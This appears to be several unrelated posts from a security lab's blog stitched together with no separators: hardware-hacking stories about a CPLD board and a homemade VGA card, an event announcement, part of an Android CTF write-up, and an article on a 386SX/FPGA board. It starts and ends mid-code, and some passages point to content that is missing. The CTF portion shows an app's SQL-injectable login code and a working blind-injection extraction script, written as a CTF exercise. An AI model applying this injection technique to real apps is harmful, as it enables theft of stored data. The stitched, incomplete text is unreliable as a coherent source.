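            samples = signals[name]
            # Only value changes are recorded, hence the format's name.
            if t < len(samples) and previous.get(name) != samples[t]:
                changes.append(f"{samples[t]}{ids[name]}")
                previous[name] = samples[t]
        if changes:
            lines.append(f"#{t}")
            lines.extend(changes)
    return "\n".join(lines) + "\n"


print(to_vcd({"CLK": [0, 1, 0, 1], "MOSI": [0, 0, 1, 1]}))
```

The resulting text can be written to a file and opened with a waveform viewer
such as gtkwave.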

However, each probe circuit consumed a significant number of logic blocks,
which restricted the design to tiny FIFOs and made the logic analyser useless
on complex circuits.

Section II: ...And Time

After this first disappointment related to the quite limited space provided by
the CPLD, they pursued their work on the SPI module by implementing the
operations required to drive a JEDEC-compliant serial flash memory.

Driving the SPI flash was actually quite easy when it was previously extracted
from its original circuit. This one was desoldered from a PC motherboard:

    sf.dump(0x1FE000, size=25)
    b'Award BootBlock BIOS v1.0'
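
On common SPI NOR flashes, a read like this one starts with the "Read Data"
opcode (0x03) followed by a 24-bit address sent MSB first, after which the
memory streams bytes out for as long as it is clocked. The helper below only
builds those first four bytes; its name is hypothetical and whether the dump
method used this exact command is an assumption.

```python
READ_DATA = 0x03  # "Read Data" opcode shared by most SPI NOR flashes


def read_command(address):
    """Return the 4 bytes clocked out on MOSI to start a read at `address`."""
    if not 0 <= address < (1 << 24):
        raise ValueError("address must fit in 24 bits")
    return bytes([READ_DATA]) + address.to_bytes(3, "big")


print(read_command(0x1FE000).hex())  # 031fe000
```

After these four bytes, each additional group of eight clock ticks returns the
next byte of the memory on MISO.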

The real challenge was to probe the SPI packets in a passive way. This
implied basing the IOModule logic on the SPI clock imposed by an external
device instead of the regular system clock. Even though all this logic had been
implemented and tested on simple devices, it was still returning malformed data
when used on a PC motherboard since the BIOS flash was clocked at a frequency
higher than 40MHz.

Their guess for the reason of this issue was based on the fact that no IO pins
were connected to a clock input of the CPLD. This meant that the SPI clock was
gated by a regular IO input not designed to support such high frequency.

Chapter VI: Displayed As Of Yore

Affected by these previous failures, the first two tinkerers had doubts about
the real efficiency of the current hardware design of their board. Out of
curiosity and driven by their discouragement, they looked for the third one,
probably lost in his solo projects.

They found him in his basement, soldering wires and axial resistors to a VGA
connector. He explained that he was, oddly, trying to make the main board act
as a video card. That was a plainly useless job but he was glad to do it. Bored,
the other two tried to help him finish and agreed that it would be their
last experiment with their board.

Section I: The Dilemma Of Etching Copper

Although driving VGA signals was quite simple, they estimated that
creating a dedicated expansion board would make their job easier. Firstly, it
would allow the mechanical integration of a decent VGA connector. Secondly,
it was a good opportunity to add some extra memory to the board, as the CPLD
would not be able to store the data needed to implement a video card.
A standard 128KB static RAM in an SSOP package was chosen for its simple
interface and its fast response time.

The VGA's RGB pins had to be driven by analog signals, which implied the use of
Digital to Analog Converters controlled from the CPLD. As these signals
were terminated to ground by a 75 Ohm resistor on the monitor side,
a cheap equivalent of a DAC could be obtained by connecting different resistors
to several CPLD outputs, wired in parallel and acting as a voltage
divider with the monitor's termination resistor (see R1 to R6).
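The divider can be checked numerically. The sketch below assumes two push-pull 3.3V outputs per colour channel and made-up resistor values (470 and 1000 Ohm), since the actual values of R1 to R6 are not given here:

```python
V_IO = 3.3                 # CPLD output high level in volts (assumed)
R_TERMINATION = 75         # monitor-side termination in ohms
R_MSB, R_LSB = 470, 1000   # hypothetical resistor values for one colour channel

def channel_voltage(code):
    """Voltage on one colour pin for a 2-bit code, outputs driven to 0 V or V_IO."""
    resistors = (R_LSB, R_MSB)
    # Millman's theorem: each output is a source behind its resistor and the
    # termination is one more branch tied to ground.
    injected = sum(V_IO / r for bit, r in enumerate(resistors) if (code >> bit) & 1)
    conductance = sum(1 / r for r in resistors) + 1 / R_TERMINATION
    return injected / conductance

for code in range(4):
    print(code, round(channel_voltage(code), 3))
```

With these values every level stays below the 0.7V full-scale level of a VGA colour signal, which is the constraint that the real resistor choice has to satisfy.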

By allocating 6 outputs to the RGB signals, 64 colors could be generated.
However, the limited number of IO pins prevented using all 17 pins of the
SRAM's address bus at the same time as the 6 pins of the RGB signals.

In order to postpone this design decision, jumpers were added to the
extension PCB to allow configuration at soldering time. The first setting
allowed 8 colors with the full 128KB of video RAM, while the second one
restricted the RAM to 16KB but could drive 64 colors (see the table on the
bottom layer of the PCB).

Section II: A Proselytized Static Memory

On a regular video card, the framebuffer was supposed to be stored in a
dual-port RAM so that the controller could write the displayed frame at the
same time as the signal generator read it. As this kind of device had to be
controlled through a large number of pins, a regular SRAM was used as a
substitute for a real VRAM.

Of course, this tweak forced a tighter management of the VRAM, as two
independent actors were using it at the same time through a single
interface.

From a high-level point of view the simple video card could be represented as an
IOModule by following this architecture:

To manage the VRAM, the trick was to exploit the fact that the pixel clock
required to display a resolution of 640x480 at 60Hz was fixed at 25.175
MHz. As the IO controller was clocked at 48MHz, odd ticks were used to read
from VRAM and to drive the pixel clock at 24MHz, which was acceptable for most
recent VGA monitors. Meanwhile, even ticks were used to perform the write
operations on the VRAM. To ensure that write operations were successful, the
read operation that followed a write was cancelled, which was
not critical most of the time but could lead to small display glitches.
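To see what running the pixel clock at 24MHz costs, the refresh rate can be recomputed from the standard 640x480 timing, which counts 800 pixel periods per line and 525 lines per frame once blanking is included:

```python
H_TOTAL, V_TOTAL = 800, 525  # 640x480 visible area plus blanking intervals

def refresh_rate(pixel_clock_hz):
    """Frames per second obtained when every pixel period lasts one clock tick."""
    return pixel_clock_hz / (H_TOTAL * V_TOTAL)

for clock in (25_175_000, 24_000_000):
    print(f"{clock / 1e6:.3f} MHz -> {refresh_rate(clock):.2f} Hz")
```

The monitor therefore sees a frame rate of about 57Hz instead of the nominal 59.94Hz, a deviation below 5%.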

The VRAM management unit could be described with the following state-machine:

1: If a write operation has to be performed, then, drive the data and the
address bus. Else, drive the address bus for the next reading.

2: Reading state: Capture the output of the VRAM

3: Writing state: Indicate to the VRAM that the data bus is ready to be read
for a memory writing.
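One possible reading of these three states is that each pixel slot spends one tick in state 1 and the next tick in either state 2 or state 3. The model below follows that assumption; the function name and data structures are illustrative only, and a cancelled read is reported as None:

```python
from collections import deque

def run_vram_arbiter(ram, read_addrs, writes):
    """Simulate the VRAM sharing, one pixel slot (two 48 MHz ticks) at a time.

    ram is indexable by address, read_addrs lists the address the display
    wants in each slot, writes is a list of (address, value) requests.
    """
    pending = deque(writes)
    pixels = []
    for addr in read_addrs:
        if pending:
            # State 1 drove address and data, state 3 commits the write.
            write_addr, value = pending.popleft()
            ram[write_addr] = value
            pixels.append(None)  # the read of this slot is lost (display glitch)
        else:
            # State 1 drove the read address, state 2 captures the VRAM output.
            pixels.append(ram[addr])
    return pixels
```

For instance, with a single pending write, only the first pixel slot loses its read and the following slots are displayed normally.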

Section III: Words Engraved In A Black Screen

As the VRAM management core logic and the VGA signal generation were working
correctly, only the logic that drove the reads from the VRAM and set the RGB
signals according to the VRAM's data had to be adapted to change what was
displayed.

To demonstrate how the VRAM could be managed, a simple text mode had been
implemented.

VRAM was organized as follows:
- 0x0000 - Text framebuffer: as in the VGA-compatible text mode implemented on PC
platforms, each character consisted of one byte for the ASCII code and a
second one for the color.
- 0x0700 - Character set (3KB): Sprites representing each character. A font
similar to IBM's code page 437 was used.

As only one read from the VRAM was possible per pixel clock tick, the read
sequence had to be aligned with the character display. During the last three
pixels of a character, the VRAM reading logic fetched the ASCII code and the
color of the next character from the framebuffer and provided the display
logic with the corresponding sprite row from the character set.
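The three reads can be expressed as address computations. The sketch below assumes 256 glyphs of 12 one-byte rows each (which is what a 3KB character set would hold) and takes the number of text columns as a parameter, since neither value is stated in the text:

```python
TEXT_BASE = 0x0000   # text framebuffer
FONT_BASE = 0x0700   # character set
GLYPH_ROWS = 12      # assumption: 3 KB / 256 glyphs, one byte per 8-pixel row

def cell_addresses(col, row, columns):
    """Addresses of the ASCII byte and of the color byte of one character cell."""
    base = TEXT_BASE + 2 * (row * columns + col)
    return base, base + 1

def glyph_row_address(ascii_code, scanline):
    """Address of the sprite row to display for this character on this scanline."""
    return FONT_BASE + ascii_code * GLYPH_ROWS + scanline % GLYPH_ROWS
```

The first two addresses are read from the framebuffer, and the ASCII code that comes back is needed before the third address can be computed, which is why the reads have to happen in sequence.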

Epilogue

Surprisingly, the first two tinkerers found unexpected satisfaction in completing
this dumb video card. The result of this last experiment reflected the childish
feelings that had pushed them to start their first board: a satisfying design
serving a useless objective.

This forced step back helped them to highlight the items that could improve the
next version of the board, if someone were brave enough to follow in their
footsteps. The lack of logic blocks could be easily solved by switching to an
FPGA. A lot of decent ones were still available in 144-pin EQFP packages.
Allocating pins to an external RAM would also not be a waste. Many other
applications were blocked by the lack of an embedded and easy to use memory.

Concerning the timing issues encountered while probing the SPI flash, simply
mapping some clock inputs to physical headers would be enough to unscramble
most of them.

After that, the team of tinkerers split up. Each of them had fallen in line with
the 'state-of-the-art'-ish folk and they finally scattered to where engineers
dwell...

For the sixth year, we are organising the LSE Summer Week mid-July to show the
work we are doing here at the LSE, about various themes we like, have
encountered or overall judge interesting.

The exact planning and subjects addressed will be announced later, as well as
the exact timetable. As we did last year, we are also opening the talks to
external contributors and all LSE members, present or past.

The presentations will be held in French as usual and we will try to record
everything.

Let's extract the apk and decompile it in order to see what is inside. For
this, I like to use 2 different tools, as they are not giving us the same
output (and I am lazy, and don't know how to do it with only one tool).

First, dex2jar takes an apk, and turns it to a jar. We can then read the code
with jd-gui.

$ dex2jar illintentions.apk
$ jd-gui illintentions.apk

The other tool is apktool, which gives us all the manifests and metadata
correctly reversed and readable.

What can we see here? There are some native libraries for multiple architectures,
some resources, and the code for a simple application.

Let's try to see what we can find in the java code:

We have 6 classes in this apk:

MainActivity: probably the entry point

Send_to_Activity

IsThisTheRealOne

DefinitelyNotThisOne

ThisIsTheRealOne

Utilities

Here is the main activity:

    package com.example.application;

    import android.app.Activity;
    import android.content.IntentFilter;
    import android.os.Bundle;
    import android.widget.TextView;

    public class MainActivity extends Activity
    {
      public void onCreate(Bundle paramBundle)
      {
        super.onCreate(paramBundle);
        paramBundle = new TextView(getApplicationContext());
        paramBundle.setText("Select the activity you wish to interact with.To-Do: Add buttons to select activity, for now use Send_to_Activity");
        setContentView(paramBundle);
        paramBundle = new IntentFilter();
        paramBundle.addAction("com.ctf.INCOMING_INTENT");
        registerReceiver(new Send_to_Activity(), paramBundle, "ctf.permission._MSG", null);
      }
    }

The application registers a handler for a broadcast intent named
"com.ctf.INCOMING_INTENT" and uses Send_to_Activity as a BroadcastReceiver.

    public void onReceive(Context paramContext, Intent paramIntent)
    {
      paramIntent = paramIntent.getStringExtra("msg");
      if (paramIntent.equalsIgnoreCase("ThisIsTheRealOne"))
      {
        paramContext.startActivity(new Intent(paramContext, ThisIsTheRealOne.class));
        return;
      }
      if (paramIntent.equalsIgnoreCase("IsThisTheRealOne"))
      {
        paramContext.startActivity(new Intent(paramContext, IsThisTheRealOne.class));
        return;
      }
      if (paramIntent.equalsIgnoreCase("DefinitelyNotThisOne"))
      {
        paramContext.startActivity(new Intent(paramContext, DefinitelyNotThisOne.class));
        return;
      }
      Toast.makeText(paramContext, "Which Activity do you wish to interact with?", 1).show();
    }

What we can see is that it takes a string parameter "msg" and starts
one of the activities in the apk depending on its value. Let's try to
trigger one of them, and look at what it does.
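One way to send such a broadcast is the `am broadcast` command of the Android shell. The helper below only builds the command line; broadcast_command is a name made up for this sketch, and since the receiver is registered with the "ctf.permission._MSG" permission, the sender may also need to hold that permission, which is not handled here:

```python
import shlex

ACTION = "com.ctf.INCOMING_INTENT"  # action registered by MainActivity

def broadcast_command(msg):
    """Build an `adb shell am broadcast` command carrying the "msg" string extra."""
    return ["adb", "shell", "am", "broadcast", "-a", ACTION, "--es", "msg", msg]

print(shlex.join(broadcast_command("ThisIsTheRealOne")))
```

The resulting list can be passed to subprocess.run once a device or an emulator running the application is attached.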

We have 3 choices:

ThisIsTheRealOne

IsThisTheRealOne

DefinitelyNotThisOne

Let's assume we can ignore DefinitelyNotThisOne and try ThisIsTheRealOne.

Ok, so we have a button that sends an intent with 3 parameters when clicked.
Some of the parameters come from the resources stored in the apk. For those, we
have 2 xml files from the apktool extraction:

Interlude: Can you repo it?

Can you repo it?

5 points

Do you think the developer of Ill Intentions knows how to set up public repositories?

Really nothing much to say here: we grabbed the git username of the developer
of Ill Intentions in res/values/strings.xml, "l33tdev42", looked him up on
GitHub, cloned the only repository available, and took a look at the git
history. The last commit is this one:

Do we really need to say more? That was fun, and this is something I really
liked in this whole CTF: most of (if not all) the challenges were close to
real-world scenarios! It is really interesting to have something like that in a
CTF, congrats Google!

Back to the challenge

Back to our intents! orThat() is a native method contained inside the library
hello-jni.so. Let's take a look at it.

    public class LoginReceiver extends BroadcastReceiver
    {
      public void onReceive(Context paramContext, Intent paramIntent)
      {
        Object localObject = paramIntent.getStringExtra("username");
        paramIntent = paramIntent.getStringExtra("password");
        Log.d("Received", (String)localObject + ":" + paramIntent);
        paramIntent = new LocalDatabaseHelper(paramContext).checkLogin((String)localObject, paramIntent);
        localObject = new Intent();
        ((Intent)localObject).setAction("com.bobbytables.ctf.myapplication_OUTPUTINTENT");
        ((Intent)localObject).putExtra("msg", paramIntent);
        paramContext.sendBroadcast((Intent)localObject);
      }
    }

    public String checkLogin(String paramString1, String paramString2)
    {
      SQLiteDatabase localSQLiteDatabase = getReadableDatabase();
      Cursor localCursor = localSQLiteDatabase.rawQuery("select password,salt from users where username = \"" + paramString1 + "\"", null);
      Log.d("Username", paramString1);
      if ((localCursor != null) && (localCursor.getCount() > 0))
      {
        localCursor.moveToFirst();
        paramString1 = localCursor.getString(0);
        String str = localCursor.getString(1);
        localCursor.close();
        localSQLiteDatabase.close();
        if (Utils.calcHash(paramString2 + str).equals(paramString1))
        {
          Log.d("Result", "Logged in");
          return "Logged in";
        }
        Log.d("Result", "Incorrect password");
        return "Incorrect password";
      }
      if (localCursor != null)
        localCursor.close();
      localSQLiteDatabase.close();
      Log.d("Result", "User does not exist");
      return "User does not exist";
    }

    public void onCreate(SQLiteDatabase paramSQLiteDatabase)
    {
      paramSQLiteDatabase.execSQL("CREATE TABLE users (_id INTEGER PRIMARY KEY,username TEXT,password TEXT,flag TEXT,salt TEXT)");
    }

    public long insert(String paramString1, String paramString2)
    {
      int i = new Random().nextInt(31337);
      paramString2 = Utils.calcHash(paramString2 + new Integer(i).toString());
      SQLiteDatabase localSQLiteDatabase = getWritableDatabase();
      ContentValues localContentValues = new ContentValues();
      localContentValues.put("username", paramString1);
      localContentValues.put("password", paramString2);
      localContentValues.put("flag", "ctf{An injection is all you need to get this flag - " + paramString2 + "}");
      localContentValues.put("salt", new Integer(i).toString());
      long l = localSQLiteDatabase.insert("users", null, localContentValues);
      localSQLiteDatabase.close();
      return l;
    }

As we can see, there is a simple SQL injection in the checkLogin method. The
code shows that the application answers with an intent
"com.bobbytables.ctf.myapplication_OUTPUTINTENT" whose "msg" parameter is
"User does not exist" if the query returns no result, and "Incorrect password"
if the query returns a result.

Ok, so let's try to exploit this as a blind injection!

First we need a query that returns a result or not depending on a condition we
control. As we can see, the salt will always be under 31337, so we can use that
to always have some kind of result. Let's inject as a username:
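The payload used during the CTF is not reproduced here. As an illustration of the principle only, the sketch below rebuilds the vulnerable query against an in-memory SQLite database and recovers the flag column one character at a time. It deviates from the application on purpose: it quotes the username with single quotes so that it does not depend on SQLite accepting double-quoted string literals, and the table content, the payload and all helper names are invented for the example.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the application database, with one made-up user."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (_id INTEGER PRIMARY KEY,username TEXT,"
               "password TEXT,flag TEXT,salt TEXT)")
    db.execute("INSERT INTO users (username,password,flag,salt) VALUES (?,?,?,?)",
               ("admin", "deadbeef", "ctf{example}", "1234"))
    return db

def check_login(db, username):
    """Same string concatenation as checkLogin, reduced to the two useful answers."""
    query = "select password,salt from users where username = '" + username + "'"
    rows = db.execute(query).fetchall()
    return "Incorrect password" if rows else "User does not exist"

def oracle(db, condition):
    """True when the injected SQL condition holds for at least one row."""
    payload = "' or (" + condition + ") -- "
    return check_login(db, payload) == "Incorrect password"

def extract_flag(db):
    flag, pos = "", 1
    while oracle(db, f"length(flag) >= {pos}"):
        low, high = 0, 127
        while low < high:  # binary search on the character code
            mid = (low + high) // 2
            if oracle(db, f"unicode(substr(flag, {pos}, 1)) > {mid}"):
                low = mid + 1
            else:
                high = mid
        flag += chr(low)
        pos += 1
    return flag

print(extract_flag(make_db()))
```

Against the real application, each call to oracle would be one broadcast carrying the payload as "username", with the answer read from the output intent.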

The LSE-PC aims to be a compact IBM-PC compatible development board based on an
Intel 80386SX CPU and an Altera Cyclone IV EP4CE22E22 FPGA in order to
emulate a custom chipset.

The main goal of this project is to create a simple, debuggable and customisable
version of the well-known PC hardware architecture. Its purpose is mainly
didactic, for students or experienced developers who want to get started with x86
low-level programming.

Hardware Overview

The schematics were designed using gschem, which
is part of the gEDA project. Although the provided component library is
acceptable, most of the chips used on this board are uncommon and so need to
be drawn before starting the overall schematics. This tedious work was achieved
using the djboxsym tool,
which allows quick production of gschem symbols from a minimal description.

Central Processing Unit

The CPU used on this board is an 80386SX designed by Intel and released in
1988. It is basically a cut-down version of the original 386 with a 16-bit
physical data bus. Although memory access performance suffers significantly, it
is still fully 32-bit internally and was designed to be used in a 16-bit
environment, which is simpler and cheaper to design than a full 32-bit
compatible motherboard. The physical address bus is only 24-bit, which limits
the address space to 16MB.

The model used here is an NG80386SXLP20 which is a low power version
clocked at 20MHz and packaged in a 100-pin Plastic Quad Flat pack. Of course,
this chip is today considered obsolete but is still the only 32-bit x86 CPU
which is simple enough to be integrated in an amateur board.

Field-Programmable Gate Array

The main criterion for choosing an appropriate FPGA was packaging.
Knowing that this chip would be hand-soldered, selecting a Ball Grid Array based
component was inconceivable. I'm also quite used to working with Altera's FPGAs,
so one from the Cyclone IV series was a good compromise. The model chosen is an
EP4CE22E22C7N released in 2009. With its 22320 logic elements, it is one of
the largest FPGAs available in EQFP. This package, only used by Altera, is an
enhanced version of the standard plastic quad flat package which uses a pitch of
0.5 millimeter between pins. This layout allows the FPGA to expose 144 pins,
of which 62 can be used as I/O and 15 as clock inputs.

Another useful feature is the 3.3V PCI compliant mode of the IO banks.
It provides compatibility with 5V devices by enabling a clamping diode which can
support 25mA. This explains the use of 120 Ohm resistors between the CPU's 5V
signals and the FPGA IO.
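The resistor value can be checked with a worst-case estimate. The sketch assumes that the CPU drives a full 5V and that the clamp holds the pin at the 3.3V rail plus an optional diode drop, which is a simplification of the real IO cell:

```python
V_CPU = 5.0          # CPU output high level in volts (worst case: full rail)
V_IO = 3.3           # FPGA IO bank supply in volts
R_SERIES = 120.0     # series resistor in ohms
CLAMP_LIMIT = 0.025  # 25 mA supported by the clamping diode

def clamp_current(diode_drop=0.0):
    """Current pushed into the clamp diode by one CPU output held high."""
    return max(0.0, (V_CPU - V_IO - diode_drop) / R_SERIES)

print(f"{clamp_current() * 1000:.1f} mA")  # prints 14.2 mA
```

Even when the diode drop is ignored, the current stays well under the 25mA limit.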

The CPU needs a 20MHz input clock to operate correctly. A single oscillator is
used to clock both the CPU and the FPGA. The idea here is that if the FPGA needs
a higher clock speed, an internal Phase Locked Loop can be used
to obtain the desired frequency from this 20MHz clock.

FPGA programming and debugging can be performed through JTAG. Altera provides
a dedicated programmer called the USB Blaster which can be easily used with
Quartus II. It provides a standard 10-pin connector and operates here at 2.5V.

As FPGA configuration is volatile, it is necessary to provide an external way
to program it when the board is powered on. Here this is achieved by an external
serial flash which contains the whole FPGA configuration. Altera sells EPCQ
devices which are dedicated to that purpose. However, most of the time those
are expensive and it turns out that they are nothing more than SPI flash
memories.
That is why it has been decided to use an M25P16, a 16Mbit flash memory from
Micron which does the job perfectly.

In fact, several programming modes are available in this FPGA. In order to
indicate which mode has to be used, MSEL pins must be pulled up or pulled down
to encode the mode number. To select the Active Serial Programming mode, it is
necessary to solder 120 Ohm resistors on R77, R79 and R81.

USB/UART bridge

In addition to JTAG, it can be a good idea to provide USB connectivity to this
design. However, implementing a USB protocol stack in an FPGA can be really
painful. The purpose of the FT230X chip is to provide a simple bridge between
a USB and a UART interface, which is simpler to implement in an FPGA. It is
provided in an SSOP16 package and is really simple to wire, thanks notably to the
fully integrated clock generation which does not require an external crystal.

Static Random Access Memory

For the main RAM, AS6C8016 from Alliance Memory has been chosen. This is a
512K x 16-bit CMOS static RAM packaged in a 44-pin TSOP. It features tri-state
output and data byte control (LB and UB signals) as required by the
80386SX.

Although this chip was originally designed to be used as a battery backed-up
non-volatile memory, its ease of use and its response time justify the low
storage space. So 1MB ought to be enough for anybody. Also, the AS6C8016 is
powered by 5V but is still fully TTL compatible, which means that it can be
driven by the CPU as well as by the 3.3V outputs of the FPGA's IO. So control
signals such as RAMCS and RAMWE are driven only by the FPGA, which performs
address decoding.

Voltage Regulation

The power circuitry has to provide four sources of different voltages:

5V: CPU, SRAM

3.3V: FPGA In/Out

2.5V: FPGA Analog PLL

1.2V: FPGA internal logic, Digital PLL

Regulation is achieved by three fixed low drop positive voltage regulators which
operate from the 5V supplied by the USB. Even though fixed regulators are often
more expensive than adjustable regulators, they are easier to wire and reduce
the number of passive components needed to perform adjustment. Only 250mA is
provided for 2.5V because it is only used by the FPGA Analog PLL and the JTAG
target voltage.

Routing and Manufacturing the Printed Circuit Board

Once the schematics are completed, the PCB has to be designed. This process has
been assisted by pcb, another part of the gEDA project.
As schematics and PCB designs are not performed using the same software (as
KiCad or Eagle do), synchronization between those is ensured thanks to the
gsch2pcb tool.

As some components on the board do not use standard packages, creating custom
pcb footprints for those chips is necessary. Like the symbols,
footprints were generated with a tool, here footgen.

The PCB routing here is a bit tricky due to the large number of signals needed
to drive the CPU. A 4-layer PCB is unavoidable in order to achieve routing and
to preserve signal integrity. As our manufacturer limits 4-layer boards to 5 x
10cm, this is the dimension adopted, which is large enough for this design.

Each layer has a dedicated purpose:

Top layer : it is mainly used for signal routing. Traces used for data
signals are 0.20mm wide, which is the limit imposed by the manufacturer. Unused
spaces are recycled into ground planes. FPGA, CPU and voltage regulators are
soldered on this layer.

Ground layer : Used almost exclusively to get a common ground plane in the
whole circuit. It has also been used to complete RAM routing.

Power layer : Dedicated to conduct power rails through the board. Four areas
corresponding to each voltage level can be clearly seen on this layer.

Bottom layer : Like the top layer, this is mainly used for signals routing.
Capacitors used to apply local filtering are soldered on this side as well
as SRAM and 20MHz oscillator.

With a low end SMD soldering station, it takes approximately three hours to
solder a whole board.

In addition to the PCB, an acrylic case was designed using
FreeCAD and then manufactured.

Emulating a rudimentary chipset

Now that the board is correctly soldered, the last thing to do before being able
to run code on the CPU is to configure the FPGA in order to emulate a basic
chipset. The design is composed of two parts : the bus controller and the memory
controller.

Bus Controller

The bus controller has to handle 80386SX bus access protocol. In order to
understand the exact purpose of it, it is necessary to detail signals involved
in the process.

The Data Bus (D[15:0]) is composed of three-state bidirectional signals
providing a general purpose data path between 386 and other devices (such
as memory).

The Address Bus (A[23:1], BHE#, BLE#) is composed of three-state
outputs providing physical memory addresses or I/O port addresses. The Byte
Enable outputs (BHE# and BLE#) indicate which bytes of the 16-bit data
bus are involved in the current transfer. If both of them are asserted,
then a 16-bit word is being transferred.

A Bus Cycle is defined by W/R#, D/C#, M/IO# and LOCK# three-state
outputs. W/R# distinguishes between write and read cycles, D/C#
distinguishes between data and control cycles, M/IO# distinguishes between
memory and I/O cycles and LOCK# indicates if the current operation is
atomic or not.

The Bus Access is controlled by ADS#, READY# and NA#.
The Address Status (ADS#) indicates that a valid bus cycle definition
and address are being driven from the 386 pins. Most of the bus controller
logic must be based on the falling-edge of this signal. READY# signal
indicates a transfer acknowledge driven by the bus controller to the 386.
NA# signal is used to request address pipelining which is not relevant in
this case.

As an example, here is a waveform of bus signals during these operations :

Write data1 to address1

Read data2 from address2

Write data3 to address3

Idle

Read data4 from address4

Each bus access operates in two steps. The first one, indicated by ADS#, is
used to drive the Bus Cycle Definition signals and an address. The second one
takes place during the next rising edge of the main clock. Depending on the W/R#
pin state, the data bus is driven with the value the CPU wants to write. During
all these sequences ADS# is still asserted.

The next bus cycle is performed when the 386 detects a falling edge on the
READY# signal. So the bus controller can be easily modeled as the following
Finite-State Machine :

As the data bus is bidirectional, it is sometimes necessary to set it to high
impedance in order to let another device drive the bus. It is also necessary to
respect the bytes requested by the CPU via BHE# and BLE#.
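The byte enable handling can be summarised by a small decoding function. This is a behavioural sketch in Python rather than the Verilog of the actual design; decode_transfer is a hypothetical name, and the pins are passed as raw levels, so 0 means asserted:

```python
def decode_transfer(a23_1, bhe_n, ble_n):
    """Return (byte_address, size_in_bytes) for one 386SX bus cycle.

    a23_1 is the value carried by A[23:1]; bhe_n and ble_n are the raw levels
    of the active-low BHE# and BLE# pins.
    """
    base = a23_1 << 1                # A0 does not exist on the 386SX
    low, high = ble_n == 0, bhe_n == 0
    if low and high:
        return base, 2               # 16-bit word on D[15:0]
    if low:
        return base, 1               # even byte on D[7:0]
    if high:
        return base + 1, 1           # odd byte on D[15:8]
    raise ValueError("no byte enable asserted")
```

For example, the first fetch after reset uses A[23:1] = 0x7FFFF8 with both enables asserted, which decodes to a word access at 0xFFFFF0.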

Memory Controller

Once the bus protocol is properly respected, the address requested by the CPU
must be decoded in order to figure out which device must be selected. This is
the purpose of the memory controller unit.

Altera Cyclone IV devices feature embedded memory structures. They consist of
M9K memory blocks that can be configured to provide various memory functions,
such as RAM, shift registers or ROM. The idea here is to use them to create a
small memory which is initialized with a basic piece of code dedicated to CPU
initialization. Another useful feature of this memory is that it can easily be
read and edited through JTAG using the In-System Content Editor provided by
Quartus II.

Basically, the main address space is composed of two memories : an external (i.e.
the SRAM) and an internal (i.e. the M9K blocks).

The first megabyte of addressable memory is organized as the layout of the
traditional IBM-PC. It means that only the first 640K of external memory are
mapped from 0x000000 to 0x0A0000 and BIOS shadow ROM (implemented here
with internal memory) is mapped from 0x0F8000 to 0x100000. Shadow ROM was
originally a 64KB memory which contains a copy of the BIOS ROM mapped on the
last 64KB of the address space. As the CPU starts fetching instructions at
0xFFFFF0 after a reset, the mechanism consists of mapping a ROM at this
address, copying ROM content on the shadow ROM and then jumping on a subroutine
located on the first megabyte.

Here, the internal RAM is only 32KB due to the FPGA limitations and is located
at 0xFF8000 and 0x0F8000 which allows simulation of the original machinery.
Moreover, the whole SRAM is mapped from 1MB which means that first 640KB of
external RAM are mapped twice.

Memory controller unit can be simplified as :

The actual address space layout is achieved by applying a logic expression
to the chip select signal of each memory. Notice that the WE# signal of the SRAM
is not active on the same level as the W/R# signal of the 386. So this signal is
inverted by the FPGA.
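The layout described above can be modelled as a decoding function. This is a behavioural sketch, not the logic expressions of the design: it assumes that the 1MB SRAM occupies 0x100000 to 0x1FFFFF and treats every other range as unmapped, which the text does not specify.

```python
def select_device(addr):
    """Map a 24-bit physical address to (device, offset), or None when unmapped."""
    addr &= 0xFFFFFF
    if addr < 0x0A0000:
        return "sram", addr                  # conventional 640K
    if 0x0F8000 <= addr < 0x100000:
        return "internal", addr - 0x0F8000   # shadow ROM in the first megabyte
    if addr >= 0xFF8000:
        return "internal", addr - 0xFF8000   # same memory, seen at reset
    if 0x100000 <= addr < 0x200000:
        return "sram", addr - 0x100000       # whole SRAM mapped from 1MB (assumed size)
    return None

print(select_device(0xFFFFF0))
```

The reset vector 0xFFFFF0 and its alias 0x0FFFF0 both land at offset 0x7FF0 of the internal memory, which is the double mapping the text relies on.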

Skeleton of a basic firmware

As an example, this section will present a basic firmware which can be run on
the LSE-PC.

Firstly, it is considered here that the entire firmware will be located on the
internal memory which is automatically initialized when the design is loaded
into the FPGA.

On reset, the 80386 CPU is running in real mode and will start to execute
the instructions located at the end of the address space: 0xFFFFF0. So the
purpose of these instructions is to jump to the first megabyte by reloading
the Code Segment. However, the last 16 bytes can be used to set up a minimal
environment to allow 16-bit application execution. The following code is an
example of 5 instructions that can be assembled to 16 bytes of opcodes. It
basically sets the Data, Stack and Code Segment Selectors, sets the stack
pointer and then jumps to the beginning of the internal RAM mapped at
0x8000.

Now that the execution flow has exited the reset state, it is possible to
set the CPU to protected mode. This can be achieved by loading a simple Global
Descriptor Table which defines the memory segments that will be used in protected
mode. Notice that the jump to reload_segs is used to flush the instruction
prefetch queue after enabling protected mode in order to validate segment
reloading. This code can be improved by setting up an
Interrupt Descriptor Table in addition to a Global Descriptor Table.
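The content of such a table can be generated with a few lines of Python. The sketch below encodes the classic flat layout (a null descriptor, one 4GB code segment and one 4GB data segment); it illustrates the descriptor format and is not necessarily the table used by this firmware:

```python
import struct

def gdt_entry(base, limit, access, flags):
    """Pack one 8-byte segment descriptor (limit is 20 bits, flags are 4 bits)."""
    entry = limit & 0xFFFF
    entry |= (base & 0xFFFFFF) << 16
    entry |= (access & 0xFF) << 40
    entry |= ((limit >> 16) & 0xF) << 48
    entry |= (flags & 0xF) << 52
    entry |= ((base >> 24) & 0xFF) << 56
    return struct.pack("<Q", entry)

GDT = b"".join([
    gdt_entry(0, 0, 0, 0),              # mandatory null descriptor
    gdt_entry(0, 0xFFFFF, 0x9A, 0xC),   # ring 0 code, 32-bit, 4 KB granularity
    gdt_entry(0, 0xFFFFF, 0x92, 0xC),   # ring 0 data, 32-bit, 4 KB granularity
])

print(GDT.hex())
```

With this layout the selectors 0x08 and 0x10 designate the code and data segments respectively.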

A 32-bit application can then be located at 0xF8400. The internal RAM is
segmented according to the following layout :

As the In-System Memory Content Editor accepts a special file format called
MIF (Memory Initialization File), a dedicated OCaml script has been created
to facilitate linking of several raw binary object files.
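The OCaml script itself is not reproduced here. To give an idea of what the conversion involves, here is a minimal Python sketch that turns raw bytes into MIF text, assuming a 16-bit wide memory and little-endian words (both are assumptions, as is the function name):

```python
def to_mif(data, width=16):
    """Render raw little-endian bytes as Memory Initialization File text."""
    step = width // 8
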